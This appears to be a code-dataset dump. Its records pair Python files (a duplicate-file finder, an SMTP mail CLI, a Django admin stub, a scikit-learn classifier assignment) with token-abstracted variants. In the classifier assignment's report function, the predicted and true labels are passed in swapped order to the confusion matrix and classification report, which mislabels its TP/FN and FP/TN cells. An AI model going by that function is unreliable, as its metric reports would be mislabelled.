"<import token>\nMOD = 998244353\n\n\ndef solve(N: int, Q: int, A: 'List[int]', x: 'List[int]', y: 'List[int]'):\n return\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens))\n Q = int(next(tokens))\n A = [int(next(tokens)) for _ in range(N)]\n x = [int()] * Q\n y = [int()] * Q\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n<assignment token>\n\n\ndef solve(N: int, Q: int, A: 'List[int]', x: 'List[int]', y: 'List[int]'):\n return\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens))\n Q = int(next(tokens))\n A = [int(next(tokens)) for _ in range(N)]\n x = [int()] * Q\n y = [int()] * Q\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n<assignment token>\n\n\ndef solve(N: int, Q: int, A: 'List[int]', x: 'List[int]', y: 'List[int]'):\n return\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens))\n Q = int(next(tokens))\n A = [int(next(tokens)) for _ in range(N)]\n x = [int()] * Q\n y = [int()] * Q\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens))\n Q = int(next(tokens))\n A = [int(next(tokens)) for _ in range(N)]\n x = [int()] * Q\n y = [int()] * Q\n for i in range(Q):\n x[i] = int(next(tokens))\n y[i] = int(next(tokens))\n solve(N, Q, A, x, y)\n\n\n<code token>\n",
"<import token>\n<assignment token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,876 | ca607e46abd1b8b33e9da48876b4c1dc1fe81329 | from datetime import datetime
from crontab import Crontab
| [
"from datetime import datetime\nfrom crontab import Crontab\n\n",
"from datetime import datetime\nfrom crontab import Crontab\n",
"<import token>\n"
] | false |
99,877 | 79f18506a24a06170a26ff49adcd65f90f05ca26 | import sys
import os
import argparse
from collections import defaultdict
def search_doubles(dirpath):
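    """Group files under dirpath by (name, size) and return the groups that appear in more than one directory."""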
compare_files = defaultdict(list)
for dirpath, dirnames, filenames in os.walk(dirpath):
for fname in filenames:
fsize = os.path.getsize(os.path.join(dirpath, fname))
compare_files[(fname, fsize)].append(dirpath)
return filter(lambda x: len(x[1]) > 1, compare_files.items())
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--path',
help='start directory for searching duplicates',
required=True)
return parser.parse_args()
if __name__ == '__main__':
args = get_args()
for found_file in search_doubles(args.path):
for path in found_file[1]:
print('%d %s/%s' % (found_file[0][1], path, found_file[0][0]))
| [
"import sys\nimport os\nimport argparse\nfrom collections import defaultdict\n\n\ndef search_doubles(dirpath):\n compare_files = defaultdict(list)\n for dirpath, dirnames, filenames in os.walk(dirpath):\n for fname in filenames:\n fsize = os.path.getsize(os.path.join(dirpath, fname))\n compare_files[(fname, fsize)].append(dirpath)\n return filter(lambda x: len(x[1]) > 1, compare_files.items())\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--path',\n help='start directory for searching duplicates',\n required=True)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = get_args()\n for found_file in search_doubles(args.path):\n for path in found_file[1]:\n print('%d %s/%s' % (found_file[0][1], path, found_file[0][0]))\n",
"import sys\nimport os\nimport argparse\nfrom collections import defaultdict\n\n\ndef search_doubles(dirpath):\n compare_files = defaultdict(list)\n for dirpath, dirnames, filenames in os.walk(dirpath):\n for fname in filenames:\n fsize = os.path.getsize(os.path.join(dirpath, fname))\n compare_files[fname, fsize].append(dirpath)\n return filter(lambda x: len(x[1]) > 1, compare_files.items())\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--path', help=\n 'start directory for searching duplicates', required=True)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = get_args()\n for found_file in search_doubles(args.path):\n for path in found_file[1]:\n print('%d %s/%s' % (found_file[0][1], path, found_file[0][0]))\n",
"<import token>\n\n\ndef search_doubles(dirpath):\n compare_files = defaultdict(list)\n for dirpath, dirnames, filenames in os.walk(dirpath):\n for fname in filenames:\n fsize = os.path.getsize(os.path.join(dirpath, fname))\n compare_files[fname, fsize].append(dirpath)\n return filter(lambda x: len(x[1]) > 1, compare_files.items())\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--path', help=\n 'start directory for searching duplicates', required=True)\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n args = get_args()\n for found_file in search_doubles(args.path):\n for path in found_file[1]:\n print('%d %s/%s' % (found_file[0][1], path, found_file[0][0]))\n",
"<import token>\n\n\ndef search_doubles(dirpath):\n compare_files = defaultdict(list)\n for dirpath, dirnames, filenames in os.walk(dirpath):\n for fname in filenames:\n fsize = os.path.getsize(os.path.join(dirpath, fname))\n compare_files[fname, fsize].append(dirpath)\n return filter(lambda x: len(x[1]) > 1, compare_files.items())\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-p', '--path', help=\n 'start directory for searching duplicates', required=True)\n return parser.parse_args()\n\n\n<code token>\n",
"<import token>\n\n\ndef search_doubles(dirpath):\n compare_files = defaultdict(list)\n for dirpath, dirnames, filenames in os.walk(dirpath):\n for fname in filenames:\n fsize = os.path.getsize(os.path.join(dirpath, fname))\n compare_files[fname, fsize].append(dirpath)\n return filter(lambda x: len(x[1]) > 1, compare_files.items())\n\n\n<function token>\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,878 | a744dedd178ba60d143e0bce2cff17ac3633c740 | #!/usr/bin/python
#
#
# Usage: send-mail.py [OPTIONS]
# -h print this message and quit
# -s <server>[:port] - port is 25 unless specified
# -f <from address>
# -t <to address>
# -S <Subject>
# -b <body>
# -A <attachment>
import os
import smtplib
import sys
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from getopt import getopt
def main():
"""main function"""
# gather arguments
opts, args = getopt(sys.argv[1:], "hs:f:t:S:b:A:", ["help"])
attachment = None
# argument parsing
for o, a in opts:
if o in ("-h", "--help"):
print_help()
sys.exit(0)
elif o == "-s":
mail_server_string = a
elif o == "-f":
from_address = a
elif o == "-t":
to_address = a
elif o == "-S":
subject = a
elif o == "-b":
body = a
elif o == "-A":
attachment = a
else:
assert False, "unhandled option"
if len(opts) < 5:
print("too few options")
print_help()
sys.exit(1)
# parse mail server information
if ":" in mail_server_string:
mail_server, mail_port = mail_server_string.split(":")
else:
mail_server = mail_server_string
mail_port = 25
send_email(mail_server, mail_port, from_address, to_address, subject, body, attachment)
sys.exit(0)
def send_email(mail_server, mail_port, from_addr, to_addr, subject, body, attachment):
"""sends email"""
print("Sending mail from %s to %s with subject %s and attachment %s" % (from_addr,
to_addr, subject, attachment))
mail_server = mail_server
mail_port = mail_port
# create the message use MIMEMultipart, MIMEText to deal with unicode
msg = MIMEMultipart()
msg['Subject'] = subject
msg['From'] = from_addr
msg['To'] = to_addr
body = MIMEText(body, 'plain')
msg.attach(body)
#print(msg.as_string())
# add attachment, if provided
if attachment:
try:
with open(attachment, 'rb') as fp:
attach = MIMEBase('application', "octet-stream")
attach.set_payload(fp.read())
encoders.encode_base64(attach)
attach.add_header('Content-Disposition', 'attachment', filename=os.path.basename(attachment))
msg.attach(attach)
except:
print("Unable to attach file, error: ", sys.exc_info())
# send mail message
smtp = smtplib.SMTP(mail_server, mail_port)
try:
smtp.sendmail(from_addr, to_addr, msg.as_string())
except:
print("Unexpected error:" + str(sys.exc_info()[0]))
smtp.quit()
def print_help():
'''prints a help message'''
print("""Usage: send-mail.py [OPTIONS]
-h print this message and quit
-s <server>[:port] - port is 25 unless specified
-f <from address>
-t <to address>
-S <Subject>
-b <body>
-A <attachment>""")
if __name__ == '__main__':
main()
| [
"#!/usr/bin/python\n#\n#\n# Usage: send-mail.py [OPTIONS]\n# -h print this message and quit\n# -s <server>[:port] - port is 25 unless specified\n# -f <from address>\n# -t <to address>\n# -S <Subject>\n# -b <body>\n# -A <attachment>\n\nimport os\nimport smtplib\nimport sys\nfrom email import encoders\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom getopt import getopt\n\n\ndef main():\n \"\"\"main function\"\"\"\n\n # gather arguments\n opts, args = getopt(sys.argv[1:], \"hs:f:t:S:b:A:\", [\"help\"])\n attachment = None\n\n # argument parsing\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n print_help()\n sys.exit(0)\n elif o == \"-s\":\n mail_server_string = a\n elif o == \"-f\":\n from_address = a\n elif o == \"-t\":\n to_address = a\n elif o == \"-S\":\n subject = a\n elif o == \"-b\":\n body = a\n elif o == \"-A\":\n attachment = a\n else:\n assert False, \"unhandled option\"\n\n if len(opts) < 5:\n print(\"too few options\")\n print_help()\n sys.exit(1)\n\n # parse mail server information\n if \":\" in mail_server_string:\n mail_server, mail_port = mail_server_string.split(\":\")\n else:\n mail_server = mail_server_string\n mail_port = 25\n\n send_email(mail_server, mail_port, from_address, to_address, subject, body, attachment)\n\n sys.exit(0)\n\n\ndef send_email(mail_server, mail_port, from_addr, to_addr, subject, body, attachment):\n \"\"\"sends email\"\"\"\n print(\"Sending mail from %s to %s with subject %s and attachment %s\" % (from_addr, \n to_addr, subject, attachment))\n mail_server = mail_server\n mail_port = mail_port\n\n # create the message use MIMEMultipart, MIMEText to deal with unicode\n msg = MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = to_addr\n body = MIMEText(body, 'plain')\n msg.attach(body)\n #print(msg.as_string())\n\n # add attachment, if provided\n if attachment:\n try:\n with open(attachment, 'rb') as fp:\n attach = MIMEBase('application', \"octet-stream\")\n attach.set_payload(fp.read())\n encoders.encode_base64(attach)\n attach.add_header('Content-Disposition', 'attachment', filename=os.path.basename(attachment))\n msg.attach(attach)\n except:\n print(\"Unable to attach file, error: \", sys.exc_info())\n\n # send mail message\n smtp = smtplib.SMTP(mail_server, mail_port)\n try:\n smtp.sendmail(from_addr, to_addr, msg.as_string())\n except:\n print(\"Unexpected error:\" + str(sys.exc_info()[0]))\n smtp.quit()\n\n\ndef print_help():\n '''prints a help message'''\n print(\"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\")\n\n\nif __name__ == '__main__':\n main()\n\n",
"import os\nimport smtplib\nimport sys\nfrom email import encoders\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom getopt import getopt\n\n\ndef main():\n \"\"\"main function\"\"\"\n opts, args = getopt(sys.argv[1:], 'hs:f:t:S:b:A:', ['help'])\n attachment = None\n for o, a in opts:\n if o in ('-h', '--help'):\n print_help()\n sys.exit(0)\n elif o == '-s':\n mail_server_string = a\n elif o == '-f':\n from_address = a\n elif o == '-t':\n to_address = a\n elif o == '-S':\n subject = a\n elif o == '-b':\n body = a\n elif o == '-A':\n attachment = a\n else:\n assert False, 'unhandled option'\n if len(opts) < 5:\n print('too few options')\n print_help()\n sys.exit(1)\n if ':' in mail_server_string:\n mail_server, mail_port = mail_server_string.split(':')\n else:\n mail_server = mail_server_string\n mail_port = 25\n send_email(mail_server, mail_port, from_address, to_address, subject,\n body, attachment)\n sys.exit(0)\n\n\ndef send_email(mail_server, mail_port, from_addr, to_addr, subject, body,\n attachment):\n \"\"\"sends email\"\"\"\n print('Sending mail from %s to %s with subject %s and attachment %s' %\n (from_addr, to_addr, subject, attachment))\n mail_server = mail_server\n mail_port = mail_port\n msg = MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = to_addr\n body = MIMEText(body, 'plain')\n msg.attach(body)\n if attachment:\n try:\n with open(attachment, 'rb') as fp:\n attach = MIMEBase('application', 'octet-stream')\n attach.set_payload(fp.read())\n encoders.encode_base64(attach)\n attach.add_header('Content-Disposition', 'attachment', filename\n =os.path.basename(attachment))\n msg.attach(attach)\n except:\n print('Unable to attach file, error: ', sys.exc_info())\n smtp = smtplib.SMTP(mail_server, mail_port)\n try:\n smtp.sendmail(from_addr, to_addr, msg.as_string())\n except:\n print('Unexpected error:' + str(sys.exc_info()[0]))\n smtp.quit()\n\n\ndef print_help():\n \"\"\"prints a help message\"\"\"\n print(\n \"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\"\n )\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n\n\ndef main():\n \"\"\"main function\"\"\"\n opts, args = getopt(sys.argv[1:], 'hs:f:t:S:b:A:', ['help'])\n attachment = None\n for o, a in opts:\n if o in ('-h', '--help'):\n print_help()\n sys.exit(0)\n elif o == '-s':\n mail_server_string = a\n elif o == '-f':\n from_address = a\n elif o == '-t':\n to_address = a\n elif o == '-S':\n subject = a\n elif o == '-b':\n body = a\n elif o == '-A':\n attachment = a\n else:\n assert False, 'unhandled option'\n if len(opts) < 5:\n print('too few options')\n print_help()\n sys.exit(1)\n if ':' in mail_server_string:\n mail_server, mail_port = mail_server_string.split(':')\n else:\n mail_server = mail_server_string\n mail_port = 25\n send_email(mail_server, mail_port, from_address, to_address, subject,\n body, attachment)\n sys.exit(0)\n\n\ndef send_email(mail_server, mail_port, from_addr, to_addr, subject, body,\n attachment):\n \"\"\"sends email\"\"\"\n print('Sending mail from %s to %s with subject %s and attachment %s' %\n (from_addr, to_addr, subject, attachment))\n mail_server = mail_server\n mail_port = mail_port\n msg = MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = to_addr\n body = MIMEText(body, 'plain')\n msg.attach(body)\n if attachment:\n try:\n with open(attachment, 'rb') as fp:\n attach = MIMEBase('application', 'octet-stream')\n attach.set_payload(fp.read())\n encoders.encode_base64(attach)\n attach.add_header('Content-Disposition', 'attachment', filename\n =os.path.basename(attachment))\n msg.attach(attach)\n except:\n print('Unable to attach file, error: ', sys.exc_info())\n smtp = smtplib.SMTP(mail_server, mail_port)\n try:\n smtp.sendmail(from_addr, to_addr, msg.as_string())\n except:\n print('Unexpected error:' + str(sys.exc_info()[0]))\n smtp.quit()\n\n\ndef print_help():\n \"\"\"prints a help message\"\"\"\n print(\n \"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\"\n )\n\n\nif __name__ == '__main__':\n main()\n",
"<import token>\n\n\ndef main():\n \"\"\"main function\"\"\"\n opts, args = getopt(sys.argv[1:], 'hs:f:t:S:b:A:', ['help'])\n attachment = None\n for o, a in opts:\n if o in ('-h', '--help'):\n print_help()\n sys.exit(0)\n elif o == '-s':\n mail_server_string = a\n elif o == '-f':\n from_address = a\n elif o == '-t':\n to_address = a\n elif o == '-S':\n subject = a\n elif o == '-b':\n body = a\n elif o == '-A':\n attachment = a\n else:\n assert False, 'unhandled option'\n if len(opts) < 5:\n print('too few options')\n print_help()\n sys.exit(1)\n if ':' in mail_server_string:\n mail_server, mail_port = mail_server_string.split(':')\n else:\n mail_server = mail_server_string\n mail_port = 25\n send_email(mail_server, mail_port, from_address, to_address, subject,\n body, attachment)\n sys.exit(0)\n\n\ndef send_email(mail_server, mail_port, from_addr, to_addr, subject, body,\n attachment):\n \"\"\"sends email\"\"\"\n print('Sending mail from %s to %s with subject %s and attachment %s' %\n (from_addr, to_addr, subject, attachment))\n mail_server = mail_server\n mail_port = mail_port\n msg = MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = to_addr\n body = MIMEText(body, 'plain')\n msg.attach(body)\n if attachment:\n try:\n with open(attachment, 'rb') as fp:\n attach = MIMEBase('application', 'octet-stream')\n attach.set_payload(fp.read())\n encoders.encode_base64(attach)\n attach.add_header('Content-Disposition', 'attachment', filename\n =os.path.basename(attachment))\n msg.attach(attach)\n except:\n print('Unable to attach file, error: ', sys.exc_info())\n smtp = smtplib.SMTP(mail_server, mail_port)\n try:\n smtp.sendmail(from_addr, to_addr, msg.as_string())\n except:\n print('Unexpected error:' + str(sys.exc_info()[0]))\n smtp.quit()\n\n\ndef print_help():\n \"\"\"prints a help message\"\"\"\n print(\n \"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\"\n )\n\n\n<code token>\n",
"<import token>\n\n\ndef main():\n \"\"\"main function\"\"\"\n opts, args = getopt(sys.argv[1:], 'hs:f:t:S:b:A:', ['help'])\n attachment = None\n for o, a in opts:\n if o in ('-h', '--help'):\n print_help()\n sys.exit(0)\n elif o == '-s':\n mail_server_string = a\n elif o == '-f':\n from_address = a\n elif o == '-t':\n to_address = a\n elif o == '-S':\n subject = a\n elif o == '-b':\n body = a\n elif o == '-A':\n attachment = a\n else:\n assert False, 'unhandled option'\n if len(opts) < 5:\n print('too few options')\n print_help()\n sys.exit(1)\n if ':' in mail_server_string:\n mail_server, mail_port = mail_server_string.split(':')\n else:\n mail_server = mail_server_string\n mail_port = 25\n send_email(mail_server, mail_port, from_address, to_address, subject,\n body, attachment)\n sys.exit(0)\n\n\n<function token>\n\n\ndef print_help():\n \"\"\"prints a help message\"\"\"\n print(\n \"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\"\n )\n\n\n<code token>\n",
"<import token>\n<function token>\n<function token>\n\n\ndef print_help():\n \"\"\"prints a help message\"\"\"\n print(\n \"\"\"Usage: send-mail.py [OPTIONS]\n -h print this message and quit\n -s <server>[:port] - port is 25 unless specified\n -f <from address>\n -t <to address>\n -S <Subject>\n -b <body>\n -A <attachment>\"\"\"\n )\n\n\n<code token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n<code token>\n"
] | false |
99,879 | d8e914551f84135bd47115a5a632d91fafe13e0c | from django.contrib import admin
from .models import GatewayBeaconModel
class GatewayBeaconAdmin(admin.ModelAdmin):
readonly_fields = ('id',)
admin.site.register(GatewayBeaconModel, GatewayBeaconAdmin)
| [
"from django.contrib import admin\n\nfrom .models import GatewayBeaconModel\n\n\nclass GatewayBeaconAdmin(admin.ModelAdmin):\n readonly_fields = ('id',)\n\n\nadmin.site.register(GatewayBeaconModel, GatewayBeaconAdmin)\n",
"from django.contrib import admin\nfrom .models import GatewayBeaconModel\n\n\nclass GatewayBeaconAdmin(admin.ModelAdmin):\n readonly_fields = 'id',\n\n\nadmin.site.register(GatewayBeaconModel, GatewayBeaconAdmin)\n",
"<import token>\n\n\nclass GatewayBeaconAdmin(admin.ModelAdmin):\n readonly_fields = 'id',\n\n\nadmin.site.register(GatewayBeaconModel, GatewayBeaconAdmin)\n",
"<import token>\n\n\nclass GatewayBeaconAdmin(admin.ModelAdmin):\n readonly_fields = 'id',\n\n\n<code token>\n",
"<import token>\n\n\nclass GatewayBeaconAdmin(admin.ModelAdmin):\n <assignment token>\n\n\n<code token>\n",
"<import token>\n<class token>\n<code token>\n"
] | false |
99,880 | f7885188b4636a70cb47ef0ab1b4a9fbbe4b2670 | '''
Scaffolding code for the Machine Learning assignment.
You should complete the provided functions and add more functions and classes as necessary.
Write a main function that calls the different functions to perform the required tasks
and repeat your experiments.
'''
'''
INSTRUCTIONS:
- Simply running the code as is will work, no actions required as long
as the dataset is in the same directory as this file.
TO CHANGE DATASETS:
- scroll all the way down to the main function and
change "path_to_data"
- the class label names should also be changed to reflect those
in the new dataset - the code handles two, binary class labels.
TO CHANGE TRAIN-TEST RATIO:
- scroll to main, change "test_set_ratio"
TO CHANGE HYPERPARAMETERS:
- go into each build_AB_classifier function
and change the dict variable called "params". Both param name and
values/ranges can be changed, and the rest of the code will handle
this change totally fine.
TO CHANGE THE RE-FIT METRIC:
- this metric determines how the hyperparameter search (GridSearchCV)
picks the best set of hyperparameter values.
- it can be changed by going into each classifier function and
changing "refit" parameter passed to GridSearchCV
- the rest of the code will handle this change without any more action
required
TO CHANGE THE SCORING METRICS:
- as long as the refit metric is included here, each classifier
function can have GridSearchCV performance reported on any metrics
desired
- they can even be different between classifiers
- scroll to the classifier function and enter string names of the
metrics desired into the GridSearchCV list parameter labelled
"scoring"
- the rest of the code will handle this change.
Nothing else should have to be changed.
'''
import numpy as np
import matplotlib.pyplot as plt
from sklearn import naive_bayes, neighbors, tree, svm, model_selection, metrics
import warnings
import time
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# REQUIRED FUNCTIONS
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def my_team():
'''
Return the list of the team members of this assignment submission as a list
of triplet of the form (student_number, first_name, last_name)
'''
return [ (10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt') ]
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def prepare_dataset(dataset_path):
'''
Read a comma separated text file where
- the first field is a ID number
- the second field is a class label 'B' or 'M'
- the remaining fields are real-valued
Return two numpy arrays X and y where
- X is two dimensional. X[i,:] is the ith example
- y is one dimensional. y[i] is the class label of X[i,:]
y[i] should be set to 1 for 'M', and 0 for 'B'
@param dataset_path: full path of the dataset text file
@return
X,y
'''
# Read the file elements (separated by commas) into a np array.
file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')
# Store the file's shape as variables to use later.
num_examples = file_as_array.shape[0]
num_features = file_as_array.shape[1]
# Create an array to store all file data except the class labels (col 1).
X = np.zeros((num_examples, num_features-1)) #dtype = float (default)
X[:,0] = file_as_array.copy()[:,0] #automatically converts to floats
X[:,1:] = file_as_array[:,2:]
# Create a 1D array to store all the class labels ('B' or 'M').
y = np.zeros_like(file_as_array[:,1], dtype=int)
for i in range(len(y)):
# Store a binary 1 for M, 0 for B
y[i] = (file_as_array[i,1]=='M')
return X,y
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def build_NB_classifier(X_training, y_training):
'''
Build a Naive Bayes classifier based on the training set X_training,
y_training, optimized for the hyperparameters passed.
@param
X_training: X_training[i,:] is the ith example
y_training: y_training[i] is the class label of X_training[i,:]
@return
nbc: the naive bayes classifier built in this function
results: the dict of scores returned by cross validation, since
GridSearchCV would also return this but it cannot be used for
NB with no hyperparameter to optimize, and CV must be done before
fitting takes place (and fitting happens here)
'''
print_clf_intro("NAIVE BAYES")
# Instantiate a Multinomial NB classifier.
nbc = naive_bayes.MultinomialNB()
# Perform cross validation and store results.
results = model_selection.cross_validate(nbc, X_training, y_training,
return_train_score=True,
scoring=['accuracy',
'precision',
'roc_auc',
'recall',
'f1'])
# Fit the data with X-training.
nbc.fit(X_training, y_training)
# Return the classifier object and CV results.
return nbc, results
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def build_DT_classifier(X_training, y_training):
'''
Build a Decision Tree classifier based on the training set X_training,
y_training, optimized for the hyperparameters passed.
@param
X_training: X_training[i,:] is the ith example
y_training: y_training[i] is the class label of X_training[i,:]
@return
dtc: the decision tree classifier built in this function (i.e. a
GridSearchCV object that is usable exactly as a clf object, but
allows access to scores from HP optimization)
'''
# HYPERPARAMTER TO OPTIMIZE: NAME AND TEST RANGE
params = { 'max_depth': np.linspace(1,100,100, dtype=int) }
print_clf_intro("DECISION TREE", params)
# Instantiate a GridSearchCV object of Decision Tree classifier type.
# Pass an int to random_state to ensure repeatability.
dtc = model_selection.GridSearchCV( tree.DecisionTreeClassifier(random_state=5),
params,
return_train_score=True,
# cv=4, #use default 3 or uncomment
scoring=['accuracy',
'roc_auc',
'precision',
'recall',
'f1'],
refit='roc_auc'
)
# Fit the data, which will run k-fold cross-validation on X_training.
with warnings.catch_warnings():
# Prevent warnings from printing (and ruining all my nice formatting!!)
# Warnings tell us that some precision values are zero, but they are
# for parameter values that are BAD and wont be used anyways, so it
# isnt an issue but we still need to test them in GridSearchCV.
warnings.simplefilter("ignore")
dtc.fit(X_training, y_training)
# Return the GridSearchCV object, which automatically uses the best
# estimator for predictions, but also allows access to cv_results_.
return dtc
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def build_NN_classifier(X_training, y_training):
'''
Build a Nearrest Neighbours classifier based on the training set X_training,
y_training, optimized for the hyperparameters passed.
@param
X_training: X_training[i,:] is the ith example
y_training: y_training[i] is the class label of X_training[i,:]
@return
knn: the k-nearest neighbors classifier built in this function (i.e. a
GridSearchCV object that is usable exactly as a clf object, but
allows access to scores from HP optimization)
'''
# HYPERPARAMETER TO OPTIMIZE: NAME AND TEST RANGE
params = { 'n_neighbors': np.linspace(1,200, 200, dtype=int) }
print_clf_intro("NEAREST NEIGHBOR", params)
# Instantiate a GridSearchCV object of KNN classifier type.
knn = model_selection.GridSearchCV( neighbors.KNeighborsClassifier(),
params,
return_train_score=True,
# cv=4, #use default 3 or uncomment
scoring=['accuracy',
'roc_auc',
'precision',
'recall',
'f1'],
refit='roc_auc'
)
# Fit the data, which will run k-fold cross-validation on X_training.
with warnings.catch_warnings():
# Prevent warnings from printing (and ruining all my nice formatting!!)
# Warnings tell us that some precision values are zero, but they are
# for parameter values that are BAD and wont be used anyways, so it
# isnt an issue but we still need to test them in GridSearchCV.
warnings.simplefilter("ignore")
knn.fit(X_training, y_training)
# Return the GridSearchCV object, which automatically uses the best
# estimator for predictions, but also allows access to cv_results_.
return knn
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def build_SVM_classifier(X_training, y_training):
'''
Build a Support Vector Machine classifier based on the training set X_training, y_training.
@param
X_training: X_training[i,:] is the ith example
y_training: y_training[i] is the class label of X_training[i,:]
@return
svm: the svm classifier built in this function (i.e. a GridSearchCV
object that is usable exactly as a clf object, but allows access
to scores from HP optimization)
'''
# HYPERPARAMETER TO OPTIMIZE: NAME AND TEST RANGE
    params = { 'gamma': np.logspace(-10, 1, 100) }
print_clf_intro("SUPPORT VECTOR MACHINE", params)
# Instantiate a GridSearchCV object of SVC classifier type.
    svc = model_selection.GridSearchCV( svm.SVC(),
params,
return_train_score=True,
# cv=4, #use default of 3, or uncomment
scoring=['accuracy',
'roc_auc',
'precision',
'recall',
'f1', ],
refit='roc_auc'
)
# Fit the data, which will run k-fold cross-validation on X_training.
with warnings.catch_warnings():
# Prevent warnings from printing (and ruining all my nice formatting!!)
# Warnings tell us that some precision values are zero, but they are
# for parameter values that are BAD and wont be used anyways, so it
# isnt an issue but we still need to test them in GridSearchCV.
warnings.simplefilter("ignore")
svc.fit(X_training, y_training)
# Return the GridSearchCV object, which automatically uses the best
# estimator for predictions, but also allows access to cv_results_.
return svc
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# ADDITIONAL FUNCTIONS
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def print_prediction_report(y_pred, y_true, names):
'''
    Print a set of statistics and metrics reporting how well the predicted
    class labels match the true labels, using the given class names.
@param:
y_true: A np-array of the target class labels as integers
y_pred: A np-array of the classifier-predicted class labels as integers
names: A tuple of the class labels (str), corresponding to (1,0)
binary integer class labels
@return:
None. Print to console.
'''
labels = (1,0)
# Confusion matrix.
print('\nConfusion Matrix:')
    cm = metrics.confusion_matrix(y_true, y_pred, labels=labels)
assert len(names)==len(cm)
assert cm.shape == (2,2)
print('{:14} {:10} {:10} {:3}'.format('PREDICTED:',names[0], names[1], 'All'))
print("ACTUAL: ")
print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm[0,0], '','(FN)', cm[0,1], sum(cm[0])))
print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm[1,0], '','(TN)', cm[1,1], sum(cm[1])))
print('{:14} {:8} {:10} {:5}'.format('All',sum(cm[:,0]), sum(cm[:,1]), sum(sum(cm))))
# Classification report.
print("\nClassification Report:")
    print(metrics.classification_report(y_true, y_pred, labels=labels, target_names=names))
# Miscellaneous metrics.
print("\nOverall Metrics:")
print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true, y_pred) ))
print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true, y_pred) ))
print('{:14} {:.2f}'.format('precision:', metrics.precision_score(y_true, y_pred) ))
print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true, y_pred) ))
print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred) ))
print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true, y_pred) ))
print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true, y_pred) ))
print('{:14} {:.2f}'.format('variance:', metrics.explained_variance_score(y_true, y_pred) ))
